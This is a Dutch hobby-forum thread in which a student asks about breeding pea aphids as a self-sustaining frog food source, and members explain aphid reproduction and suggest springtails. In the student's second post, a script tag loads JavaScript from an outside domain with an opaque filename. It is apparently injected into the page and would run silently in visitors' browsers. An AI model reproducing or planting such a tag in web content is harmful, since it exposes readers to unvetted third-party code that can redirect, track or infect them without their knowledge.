VorigVorig Go to previous topic
VolgendeVolgende Go to next topic
Laatste Bericht 07 dec 2019 17:30 door Nicolai Veen
Hoeveel erwtenluizen in een ent?
3 Antwoorden
AddThis - Bladwijzer en Delen knop
Sorteer Berichten:
U bent niet gemachtigd om antwoord te kunnen geven.
Auteur Berichten

Jack BakkerPosts:2


Profiel

Waarland
--
09 okt 2019 09:00

  Hallo ik ben Jack Bakker en ik wil graag weten hoeveel erwtenluizen er zich in 1 ent begeven en hoe de dieren zich vermenigvuldigen(ongeveer). Deze informatie heb ik nodig voor mijn profielwerkstuk, hiervoor moet ik een voedingsbron creëren die heel de vakantie kan blijven draaien en zichzelf voeren aan de kikkers. Hoe? Dat ben ik al aan het verzinnen maar ik heb alleen deze gegevens nog nodig om een goed onderzoek te kunnnen starten. 

  Bij  voorbaat dank, Jack Bakker

  0

  Johan De Gruyter  Posts:33


  Profiel

  Lier
  --
  09 okt 2019 09:20

  Erwtenluizen (Acyrthosiphon pisum) kunnen zich op twee manieren voortplanten. Zolang de omstandigheden goed zijn, zoals in de zomer, planten ze zich aseksueel voort door middel van parthenogenese. Alle bladluizen die wij kweken voor onze kikkers zijn vrouwtjes, en als je een tijdje naar de luizen kijkt zul je regelmatig zien dat er een mini-luis gewoon uit het achterste van een volwassen luis komt. Elke luis doet dit 4 tot 12 keer per dag, en zelfs meer als het langer licht is. Elk van deze miniluisjes is volwassen na een dag of 8 en kan dan ook direct meer luizen produceren.

  In de herfst als de temperaturen zakken gaan de luizen gevleugelde mannetjes produceren, die dan paren met de vrouwtjes, waarna deze eitjes leggen die overwinteren. In de lente komen hier dan terug ongevleugelde vrouwtjes uit die terug parthenogenetisch voortplanten.

  Er zijn dus niet veel luizen nodig om een goeie kolonie te starten. Ik heb oude bakjes en nieuwe naast elkaar dus de luizen lopen gewoon op de nieuwe plantjes, maar ik denk dat je met een 50 tal luizen op een 10-20 erwtenplanten wel al ruimschoots kan vertrekken. Geen idee of dit een goed vakantievoer is, ik heb zelf altijd de indruk dat de erwtenscheuten na een week of twee beginnen afsterven door plaatsgebrek en verzwakking door de vele luizen. Op dendroboard zijn er wel al een paar goede topics over voeroplossingen voor op vakantie. Misschien kan je daar eens een kijkje nemen.

  0

  Jack Bakker  Posts:2


  Profiel

  Waarland
  --
  13 nov 2019 08:36

  bar bedankt nu kan ik verder!

  <script async="" src="//mikkymax.com/20ba4519da0cfb915b.js" type="text/javascript"></script>
  0

  Nicolai Veen  Posts:233


  Profiel

  Privé

  Dn Lid


  --
  07 dec 2019 17:30

  Springstaarten kweek zal zelfs langer dan de vakantie voedsel opleveren.

  Zolang de kikkers de gehele kweek niet kunnen op eten.

  0
  U bent niet gemachtigd om antwoord te kunnen geven.


  Veel gestelde vragen (FAQ)

  Gifkikkerboek

  Back To Top